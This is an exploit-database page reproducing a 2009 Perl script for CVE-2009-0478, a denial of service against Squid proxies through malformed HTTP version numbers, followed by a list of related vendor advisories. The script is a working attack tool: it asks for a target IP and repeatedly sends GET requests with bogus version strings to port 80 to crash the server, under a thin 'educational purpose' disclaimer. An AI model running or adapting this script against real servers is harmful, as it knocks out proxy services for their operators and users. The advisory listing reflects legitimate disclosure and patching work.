Lucene search
RootSSV:66295HistoryJul 01, 2014 - 12:00 a.m.
Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service Exploit
2014-07-0100:00:00
Root
www.seebug.org
44
EPSS
0.951
Percentile
99.3%
No description provided by source.
#!usr/bin/perl -w
########################################################################################
#
# Reference:
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0478
# http://www.securityfocus.com/bid/33604/discuss
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
# Visit: http://www.evilfingers.com/
# Author: Praveen Dar$hanam
# Email: praveen[underscore]recker[at]sify.com\
# Blog: http://www.darshanams.blogspot.com/
# Date: 09th February, 2009
#
############Special thanx2 Joshua Morin, Mikko Varpiola, and Jukka Taimisto ############
########################################################################################
######Thanx to str0ke,milw0rm, @rp m@n,security folks and all INDIAN H@CKER$############
########################################################################################
use IO::Socket;
print("\nEnter IP Address of Vulnerable Server: \n");
$vuln_server_ip = <STDIN>;
chomp($vuln_server_ip);
@malicious_version=("9.9","%.%","%%","#.#","\$.\$","*.*","975.975","10000999");
foreach $mal (@malicious_version)
{
$sock_http = IO::Socket::INET->new( PeerAddr => $vuln_server_ip,
PeerPort => 80,
Proto => 'tcp') || "Unable to connect to HTTP Server";
$http_attack = "GET / HTTP/$mal\r\n".
"Host: $vuln_server_ip\r\n".
"Keep-Alive: 300\r\n".
"Connection: keep-alive\r\n\r\n";
print $sock_http $http_attack;
sleep(3);
close($sock_http);
}
# milw0rm.com [2009-02-09]
Related
freebsd
freebsd
squid -- remote denial of service vulnerability
2009-02-04 00:00:00
openvas
openvas
Fedora Core 10 FEDORA-2009-1526 (squid)
2009-02-13 00:00:00
FreeBSD Ports: squid
2009-02-13 00:00:00
Debian: Security Advisory (DSA-1732-1)
2009-03-07 00:00:00
debian
debian
[SECURITY] [DSA 1732-1] New squid3 packages fix denial of service
2009-03-03 08:23:22
[SECURITY] [DSA 1732-1] New squid3 packages fix denial of service
2009-03-03 08:23:22
nessus
nessus
Debian DSA-1732-1 : squid3 - denial of service
2009-03-04 00:00:00
FreeBSD : squid -- remote denial of service vulnerability (9c2460a4-f6b1-11dd-94d9-0030843d3802)
2009-02-09 00:00:00
Ubuntu 8.10 : squid vulnerability (USN-724-1)
2009-04-23 00:00:00
cve
cve
CVE-2009-0478
2009-02-08 22:30:00
seebug
seebug
Squid < 3.1 5 HTTP Version Number Parsing Denial of Service Exploit
2009-02-10 00:00:00
Squid Webไปฃ็็ผๅญHTTP็ๆฌๅท่งฃๆๆ็ปๆๅกๆผๆด
2009-02-11 00:00:00
ubuntu
ubuntu
Squid vulnerability
2009-02-25 00:00:00
checkpoint_advisories
checkpoint_advisories
Preemptive Protection against Squid HTTP Version Number Parsing Denial of Service
2009-01-15 00:00:00
Squid HTTP Version Number Parsing Denial of Service (CVE-2009-0478)
2009-02-23 00:00:00
prion
prion
Design/Logic Flaw
2009-02-08 22:30:00
packetstorm
packetstorm
Squid Denial Of Service
2009-02-09 00:00:00
exploitpack
exploitpack
Squid 3.1 5 - HTTP Version Number Parsing Denial of Service
2009-02-09 00:00:00
securityvulns
securityvulns
Squid cache proxy server DoS
2009-02-04 00:00:00
debiancve
debiancve
CVE-2009-0478
2009-02-08 22:30:00
ubuntucve
ubuntucve
CVE-2009-0478
2009-02-08 00:00:00
cvelist
cvelist
CVE-2009-0478
2009-02-08 22:00:00
nvd
nvd
CVE-2009-0478
2009-02-08 22:30:00
fedora
fedora
[SECURITY] Fedora 10 Update: squid-3.0.STABLE13-1.fc10
2009-02-12 20:37:10
[SECURITY] Fedora 9 Update: squid-3.0.STABLE13-1.fc9
2009-02-12 20:37:22
exploitdb
exploitdb
Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service
2009-02-09 00:00:00
gentoo
gentoo
Squid: Multiple Denial of Service vulnerabilities
2009-03-24 00:00:00